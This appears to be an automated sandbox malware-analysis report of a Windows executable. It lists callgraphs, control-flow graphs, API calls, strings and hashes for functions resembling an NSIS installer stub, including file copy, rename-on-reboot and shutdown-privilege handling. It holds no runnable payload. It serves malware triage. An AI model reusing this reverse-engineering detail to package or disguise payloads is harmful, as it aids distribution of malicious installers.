2065->2066 2066->2041 2067->2045 2068->2048 2069->2051 2071 403d35 2070->2071 2072 403d3b SendMessageW 2070->2072 2071->2072 2072->2031 2074 403e7e 2073->2074 2075 403df5 GetWindowLongW 2073->2075 2074->2008 2075->2074 2076 403e06 2075->2076 2077 403e15 GetSysColor 2076->2077 2078 403e18 2076->2078 2077->2078 2079 403e28 SetBkMode 2078->2079 2080 403e1e SetTextColor 2078->2080 2081 403e40 GetSysColor 2079->2081 2082 403e46 2079->2082 2080->2079 2081->2082 2083 403e57 2082->2083 2084 403e4d SetBkColor 2082->2084 2083->2074 2085 403e71 CreateBrushIndirect 2083->2085 2086 403e6a DeleteObject 2083->2086 2084->2083 2085->2074 2086->2085

                                                          Callgraph

                                                          • Executed
                                                          • Not Executed
                                                          • Opacity -> Relevance
                                                          • Disassembly available
                                                          callgraph 0 Function_00405942 14 Function_0040505D 0->14 18 Function_00406767 0->18 19 Function_00405F67 0->19 21 Function_00405EE9 0->21 27 Function_00403C7E 0->27 36 Function_00403E8A 0->36 38 Function_00406312 0->38 39 Function_00406794 0->39 46 Function_0040681B 0->46 47 Function_00405D1C 0->47 50 Function_0040141D 0->50 51 Function_0040601F 0->51 55 Function_00403EAB 0->55 62 Function_00406738 0->62 1 Function_00403DC5 2 Function_00405E46 3 Function_00401446 31 Function_00405F80 3->31 3->46 4 Function_00406348 5 Function_0040744B 25 Function_00407577 5->25 35 Function_00407308 5->35 6 Function_00405DCC 7 Function_0040324C 8 Function_0040604E 8->47 53 Function_00405E22 8->53 64 Function_00405D3B 8->64 9 Function_004032D2 9->4 10 Function_00405C55 11 Function_00403D55 11->46 12 Function_00407EDB 13 Function_0040145C 13->8 13->46 14->1 48 Function_0040139D 14->48 63 Function_004062B9 14->63 15 Function_00403DE0 16 Function_004037E2 16->8 40 Function_00405E95 16->40 16->62 16->64 17 Function_00405E66 20 Function_00403368 22 Function_004062EB 23 Function_00405D6F 23->47 24 Function_0040386F 44 Function_00403C99 24->44 59 Function_00406CB1 24->59 25->12 32 Function_00407501 25->32 33 Function_00407E07 25->33 54 Function_004074AB 25->54 26 Function_004060FD 26->17 28 Function_00406C7E 28->38 58 Function_00406AAF 28->58 29 Function_0040137E 29->31 30 Function_0040337F 30->5 30->20 34 Function_00404F88 30->34 60 Function_00403336 30->60 34->46 36->51 36->62 37 Function_0040548F 37->1 37->11 37->15 45 Function_00403D9B 37->45 37->46 37->48 37->50 37->51 56 Function_00403DAE 37->56 57 Function_00403D2E 37->57 39->8 39->18 39->22 39->23 39->51 39->62 41 Function_00403816 42 Function_00407297 43 Function_00403899 43->0 43->10 43->12 43->16 43->24 43->26 43->28 43->38 43->39 43->41 43->46 43->47 49 Function_0040359D 43->49 43->50 43->51 61 Function_00405CB6 43->61 44->27 46->8 46->19 46->21 46->46 46->51 48->29 52 Function_004015A0 48->52 49->9 49->17 49->18 49->20 49->30 49->42 49->51 49->53 49->60 50->48 52->3 52->13 52->19 52->22 52->23 52->28 52->29 52->34 52->47 52->48 52->51 52->63 55->19 55->31 55->46 58->6 58->17 58->46 58->53 59->2 59->18 59->22 59->28 59->34 59->39 59->47 59->51 59->59 59->62 59->63 63->26

                                                          Executed Functions

                                                          Function 00403899 Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 246 403899-40392f #17 SetErrorMode OleInitialize call 406312 SHGetFileInfoW call 40601f GetCommandLineW call 40601f GetModuleHandleW 253 403931-403934 246->253 254 403939-40394d call 405d1c CharNextW 246->254 253->254 257 4039e0-4039e6 254->257 258 403952-403958 257->258 259 4039ec 257->259 260 403962-403966 258->260 261 40395a-403960 258->261 262 403a0b-403a23 GetTempPathW call 4037e2 259->262 264 403968-40396d 260->264 265 40396e-403972 260->265 261->260 261->261 269 403a25-403a43 GetWindowsDirectoryW lstrcatW call 4037e2 262->269 270 403a49-403a63 DeleteFileW call 40359d 262->270 264->265 267 403974-40397b 265->267 268 4039ce-4039db call 405d1c 265->268 272 403990-4039a2 call 403816 267->272 273 40397d-403984 267->273 268->257 283 4039dd 268->283 269->270 286 403ae2-403af1 call 40386f CoUninitialize 269->286 270->286 287 403a65-403a6b 270->287 284 4039a4-4039ab 272->284 285 4039b7-4039cc call 403816 272->285 277 403986-403989 273->277 278 40398b 273->278 277->272 277->278 278->272 283->257 289 4039b2 284->289 290 4039ad-4039b0 284->290 285->268 300 4039ee-403a06 call 407edb call 40601f 285->300 298 403be4-403bea 286->298 299 403af7-403b07 call 405cb6 ExitProcess 286->299 292 403acb-403ad2 call 405942 287->292 293 403a6d-403a76 call 405d1c 287->293 289->285 290->285 290->289 302 403ad7-403add call 4060fd 292->302 307 403a8f-403a91 293->307 303 403c67-403c6f 298->303 304 403bec-403c09 call 406312 * 3 298->304 300->262 302->286 312 403c71 303->312 313 403c75 303->313 337 403c53-403c5e ExitWindowsEx 304->337 338 403c0b-403c0d 304->338 310 403a93-403a9d 307->310 311 403a78-403a8a call 403816 307->311 318 403b0d-403b27 lstrcatW lstrcmpiW 310->318 319 403a9f-403aaf call 406794 310->319 311->310 325 403a8c 311->325 312->313 318->286 324 403b29-403b3f CreateDirectoryW SetCurrentDirectoryW 318->324 319->286 331 403ab1-403ac7 call 40601f * 2 319->331 328 403b41-403b47 call 40601f 324->328 329 403b4c-403b6c call 40601f * 2 324->329 325->307 328->329 348 403b71-403b8d call 40681b DeleteFileW 329->348 331->292 337->303 341 403c60-403c62 call 40141d 337->341 338->337 342 403c0f-403c11 338->342 341->303 342->337 346 403c13-403c25 GetCurrentProcess 342->346 346->337 354 403c27-403c49 346->354 352 403bce-403bd6 348->352 353 403b8f-403b9f CopyFileW 348->353 352->348 356 403bd8-403bdf call 406c7e 352->356 353->352 355 403ba1-403bc1 call 406c7e call 40681b call 405c55 353->355 354->337 355->352 366 403bc3-403bca CloseHandle 355->366 356->286 366->352
                                                          APIs
                                                          • #17.COMCTL32 ref: 004038B8
                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038C3
                                                          • OleInitialize.OLE32(00000000), ref: 004038CA
                                                            • Part of subcall function 00406312: GetModuleHandleA.KERNEL32(?,?,00000020,004038DC,00000008), ref: 00406320
                                                            • Part of subcall function 00406312: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038DC,00000008), ref: 0040632B
                                                            • Part of subcall function 00406312: GetProcAddress.KERNEL32(00000000), ref: 0040633D
                                                          • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038F2
                                                            • Part of subcall function 0040601F: lstrcpynW.KERNEL32(?,?,00002004,00403907,007E95E0,NSIS Error), ref: 0040602C
                                                          • GetCommandLineW.KERNEL32(007E95E0,NSIS Error), ref: 00403907
                                                          • GetModuleHandleW.KERNEL32(00000000,008420A0,00000000), ref: 0040391A
                                                          • CharNextW.USER32(00000000,008420A0,00000020), ref: 00403941
                                                          • GetTempPathW.KERNEL32(00002004,008560C8,00000000,00000020), ref: 00403A16
                                                          • GetWindowsDirectoryW.KERNEL32(008560C8,00001FFF), ref: 00403A2B
                                                          • lstrcatW.KERNEL32(008560C8,\Temp), ref: 00403A37
                                                          • DeleteFileW.KERNELBASE(008520C0), ref: 00403A4E
                                                          • CoUninitialize.COMBASE(?), ref: 00403AE7
                                                          • ExitProcess.KERNEL32 ref: 00403B07
                                                          • lstrcatW.KERNEL32(008560C8,~nsu.tmp), ref: 00403B13
                                                          • lstrcmpiW.KERNEL32(008560C8,0084E0B8,008560C8,~nsu.tmp), ref: 00403B1F
                                                          • CreateDirectoryW.KERNEL32(008560C8,00000000), ref: 00403B2B
                                                          • SetCurrentDirectoryW.KERNEL32(008560C8), ref: 00403B32
                                                          • DeleteFileW.KERNEL32(007B1A20,007B1A20,?,007F6008,00409204,007F2000,?), ref: 00403B83
                                                          • CopyFileW.KERNEL32(0085E0D8,007B1A20,00000001), ref: 00403B97
                                                          • CloseHandle.KERNEL32(00000000,007B1A20,007B1A20,?,007B1A20,00000000), ref: 00403BC4
                                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C1A
                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                          • API String ID: 2435955865-3712954417
                                                          • Opcode ID: 51e6cc7ce2c8c92eb188c52ce46338fcab122280fa7631c11b5295fa70478681
                                                          • Instruction ID: 930d0106ac8f21ffe7c218431e73a7c1b7ebb2f3f08f251653cedcfd3481038f
                                                          • Opcode Fuzzy Hash: 51e6cc7ce2c8c92eb188c52ce46338fcab122280fa7631c11b5295fa70478681
                                                          • Instruction Fuzzy Hash: 67A1E6B1540301AAD720BF619D0AE2B3EACEF50745F15483FF582B61D2DBBD89448B6E
                                                          Function 00406312 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 593 406312-406328 GetModuleHandleA 594 406335-40633d GetProcAddress 593->594 595 40632a-406333 LoadLibraryA 593->595 596 406343-406345 594->596 595->594 595->596
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038DC,00000008), ref: 00406320
                                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038DC,00000008), ref: 0040632B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040633D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                          • String ID:
                                                          • API String ID: 310444273-0
                                                          • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                          • Instruction ID: 74a8a5aaaf3dd8a694d56da61a16f6303afc7614e5bdd8def9870afc0854d2e9
                                                          • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                          • Instruction Fuzzy Hash: BCD0123120011597D6001B65AE0895F776CEFA5611707803EF942F3131FB34D515A6EC
                                                          Function 004062EB Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 614 4062eb-4062ff FindFirstFileW 615 406301-40630a FindClose 614->615 616 40630c 614->616 617 40630e-40630f 615->617 616->617
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,007DA700,007D5AF8,004067E4,007D5AF8), ref: 004062F6
                                                          • FindClose.KERNEL32(00000000), ref: 00406302
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: cfe9f0376b8c8cff23c30bcc19c0e48e947267a495800e31c530dd607e3cc84c
                                                          • Instruction ID: 5e506215f2711f0e24a615dbcf2ef03c94eb3d964d91be164e4c0db9e35754d2
                                                          • Opcode Fuzzy Hash: cfe9f0376b8c8cff23c30bcc19c0e48e947267a495800e31c530dd607e3cc84c
                                                          • Instruction Fuzzy Hash: 80D012315141206FD34017386E4C88B7A68AF063303314B36F4A6F12E0C634CC3786ED
                                                          Function 0040548F Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 40548f-4054a1 1 4055e3-4055f2 0->1 2 4054a7-4054ad 0->2 4 405641-405656 1->4 5 4055f4-40563c GetDlgItem * 2 call 403d55 SetClassLongW call 40141d 1->5 2->1 3 4054b3-4054bc 2->3 8 4054d1-4054d4 3->8 9 4054be-4054cb SetWindowPos 3->9 6 405696-40569b call 403dc5 4->6 7 405658-40565b 4->7 5->4 19 4056a0-4056bb 6->19 11 40565d-405668 call 40139d 7->11 12 40568e-405690 7->12 14 4054d6-4054e8 ShowWindow 8->14 15 4054ee-4054f4 8->15 9->8 11->12 33 40566a-405689 SendMessageW 11->33 12->6 18 405936 12->18 14->15 20 405510-405513 15->20 21 4054f6-40550b DestroyWindow 15->21 30 405938-40593f 18->30 28 4056c4-4056ca 19->28 29 4056bd-4056bf call 40141d 19->29 25 405515-405521 SetWindowLongW 20->25 26 405526-40552c 20->26 23 405913-405919 21->23 23->18 34 40591b-405921 23->34 25->30 31 405532-405543 GetDlgItem 26->31 32 4055cf-4055de call 403de0 26->32 36 4056d0-4056db 28->36 37 4058f4-40590d DestroyWindow KiUserCallbackDispatcher 28->37 29->28 38 405562-405565 31->38 39 405545-40555c SendMessageW IsWindowEnabled 31->39 32->30 33->30 34->18 41 405923-40592c ShowWindow 34->41 36->37 42 4056e1-40572e call 40681b call 403d55 * 3 GetDlgItem 36->42 37->23 44 405567-405568 38->44 45 40556a-40556d 38->45 39->18 39->38 41->18 70 405730-405736 42->70 71 405739-405775 ShowWindow KiUserCallbackDispatcher call 403d9b EnableWindow 42->71 48 405598-40559d call 403d2e 44->48 49 40557b-405580 45->49 50 40556f-405575 45->50 48->32 53 4055b6-4055c9 SendMessageW 49->53 55 405582-405588 49->55 50->53 54 405577-405579 50->54 53->32 54->48 58 40558a-405590 call 40141d 55->58 59 40559f-4055a8 call 40141d 55->59 68 405596 58->68 59->32 67 4055aa-4055b4 59->67 67->68 68->48 70->71 74 405777-405778 71->74 75 40577a 71->75 76 40577c-4057aa GetSystemMenu EnableMenuItem SendMessageW 74->76 75->76 77 4057ac-4057bd SendMessageW 76->77 78 4057bf 76->78 79 4057c5-405803 call 403dae call 40601f lstrlenW call 40681b SetWindowTextW call 40139d 77->79 78->79 79->19 88 405809-40580b 79->88 88->19 89 405811-405815 88->89 90 405834-405848 DestroyWindow 89->90 91 405817-40581d 89->91 90->23 92 40584e-40587b CreateDialogParamW 90->92 91->18 93 405823-405829 91->93 92->23 94 405881-4058d8 call 403d55 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 92->94 93->19 95 40582f 93->95 94->18 100 4058da-4058ed ShowWindow call 403dc5 94->100 95->18 102 4058f2 100->102 102->23
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054CB
                                                          • ShowWindow.USER32(?), ref: 004054E8
                                                          • DestroyWindow.USER32 ref: 004054FC
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405518
                                                          • GetDlgItem.USER32(?,?), ref: 00405539
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040554D
                                                          • IsWindowEnabled.USER32(00000000), ref: 00405554
                                                          • GetDlgItem.USER32(?,00000001), ref: 00405603
                                                          • GetDlgItem.USER32(?,00000002), ref: 0040560D
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00405627
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405678
                                                          • GetDlgItem.USER32(?,00000003), ref: 0040571E
                                                          • ShowWindow.USER32(00000000,?), ref: 00405740
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405752
                                                          • EnableWindow.USER32(?,?), ref: 0040576D
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405783
                                                          • EnableMenuItem.USER32(00000000), ref: 0040578A
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057A2
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057B5
                                                          • lstrlenW.KERNEL32(007C5A78,?,007C5A78,007E95E0), ref: 004057DE
                                                          • SetWindowTextW.USER32(?,007C5A78), ref: 004057F2
                                                          • ShowWindow.USER32(?,0000000A), ref: 00405926
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID: xZ|
                                                          • API String ID: 3282139019-3158599731
                                                          • Opcode ID: 699d8c8571f480e4bdb3d36bb1bab13dd0e7c30a2805178f501066c7cc38f012
                                                          • Instruction ID: faf43565c4180cbf528e331297302c0a9f4643a65f382e9c74acaf045be3f04a
                                                          • Opcode Fuzzy Hash: 699d8c8571f480e4bdb3d36bb1bab13dd0e7c30a2805178f501066c7cc38f012
                                                          • Instruction Fuzzy Hash: A3C19C71401A04FFCB216F61EE89E2B3B69EB49345F40853EF642B52F0CA3A98519F1D
                                                          Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 103 4015a0-4015f4 104 4030e3-4030ec 103->104 105 4015fa 103->105 123 4030ee-4030f2 104->123 106 401601-401611 call 4062b9 105->106 107 401742-40174f 105->107 108 401962-40197d call 40145c GetFullPathNameW 105->108 109 4019ca-4019e6 call 40145c SearchPathW 105->109 110 40176e-401794 call 40145c call 4062b9 SetFileAttributesW 105->110 111 401650-40166d call 40137e call 4062b9 call 40139d 105->111 112 4017b1-4017d8 call 40145c call 4062b9 call 405d6f 105->112 113 401672-401686 call 40145c call 4062b9 105->113 114 401693-4016ac call 401446 call 4062b9 105->114 115 401715-401731 105->115 116 401616-40162d call 40145c call 4062b9 call 404f88 105->116 117 4016d6-4016db 105->117 118 401736-4030de call 405f67 105->118 119 401897-4018a7 call 40145c call 4062eb 105->119 120 4018db-401910 call 40145c * 3 call 4062b9 MoveFileW 105->120 121 40163c-401645 105->121 122 4016bd-4016d1 call 4062b9 SetForegroundWindow 105->122 106->123 134 401751-401755 ShowWindow 107->134 135 401758-40175f 107->135 166 4019a3-4019a8 108->166 167 40197f-401984 108->167 109->104 160 4019ec-4019f8 109->160 110->104 186 40179a-4017a6 call 4062b9 110->186 111->123 206 401864-40186c 112->206 207 4017de-4017fc call 405d1c CreateDirectoryW 112->207 187 401689-40168e call 404f88 113->187 180 4016b1-4016b8 Sleep 114->180 181 4016ae-4016b0 114->181 115->123 131 401632-401637 116->131 129 401702-401710 117->129 130 4016dd-4016fd call 401446 117->130 118->104 188 4018c2-4018d6 call 4062b9 119->188 189 4018a9-4018bd call 4062b9 119->189 215 401912-401919 120->215 216 40191e-401921 120->216 121->131 132 401647-40164e PostQuitMessage 121->132 122->104 129->104 130->104 131->123 132->131 134->135 135->104 151 401765-401769 ShowWindow 135->151 151->104 160->104 170 4019af-4019b2 166->170 167->170 177 401986-401989 167->177 170->104 182 4019b8-4019c5 GetShortPathNameW 170->182 177->170 190 40198b-401993 call 4062eb 177->190 180->104 181->180 182->104 201 4017ab-4017ac 186->201 187->104 188->123 189->123 190->166 212 401995-4019a1 call 40601f 190->212 201->104 210 401890-401892 206->210 211 40186e-40188b call 404f88 call 40601f SetCurrentDirectoryW 206->211 219 401846-40184e call 4062b9 207->219 220 4017fe-401809 GetLastError 207->220 210->187 211->104 212->170 215->187 221 401923-40192b call 4062eb 216->221 222 40194a-401950 216->222 233 401853-401854 219->233 224 401827-401832 GetFileAttributesW 220->224 225 40180b-401825 GetLastError call 4062b9 220->225 221->222 239 40192d-401948 call 406c7e call 404f88 221->239 229 401957-40195d call 4062b9 222->229 231 401834-401844 call 4062b9 224->231 232 401855-40185e 224->232 225->232 229->201 231->233 232->206 232->207 233->232 239->229
                                                          APIs
                                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                                          • ShowWindow.USER32(?), ref: 00401753
                                                          • ShowWindow.USER32(?), ref: 00401767
                                                          • SetFileAttributesW.KERNEL32(00000000,?), ref: 0040178C
                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0), ref: 004017F4
                                                          • GetLastError.KERNEL32(?,?,000000F0), ref: 004017FE
                                                          • GetLastError.KERNEL32(?,?,000000F0), ref: 0040180B
                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0), ref: 0040182A
                                                          • SetCurrentDirectoryW.KERNELBASE(?,0084A0B0,?,000000E6,0040F0D0,?,?,?,000000F0), ref: 00401885
                                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                          Strings
                                                          • Rename failed: %s, xrefs: 0040194B
                                                          • Rename: %s, xrefs: 004018F8
                                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                          • SetFileAttributes failed., xrefs: 004017A1
                                                          • Aborting: "%s", xrefs: 0040161D
                                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                          • Jump: %d, xrefs: 00401602
                                                          • Rename on reboot: %s, xrefs: 00401943
                                                          • Call: %d, xrefs: 0040165A
                                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                          • detailprint: %s, xrefs: 00401679
                                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                          • BringToFront, xrefs: 004016BD
                                                          • Sleep(%d), xrefs: 0040169D
                                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                          • API String ID: 2872004960-3619442763
                                                          • Opcode ID: 2334d8fe73ec4b01fb7e5ac695799e8d2c9532c401a49a7834db5fb369bfdc0f
                                                          • Instruction ID: 748122a4b1e4c8b0444bddd0dc60868c48b22d194fcfef730b64eaf2fe916135
                                                          • Opcode Fuzzy Hash: 2334d8fe73ec4b01fb7e5ac695799e8d2c9532c401a49a7834db5fb369bfdc0f
                                                          • Instruction Fuzzy Hash: 3CB1D172A01204EFDB107FA1DD459AE3B78EF05354B25817FF942B62E1DA3D8A40CA6D
                                                          Function 00405942 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
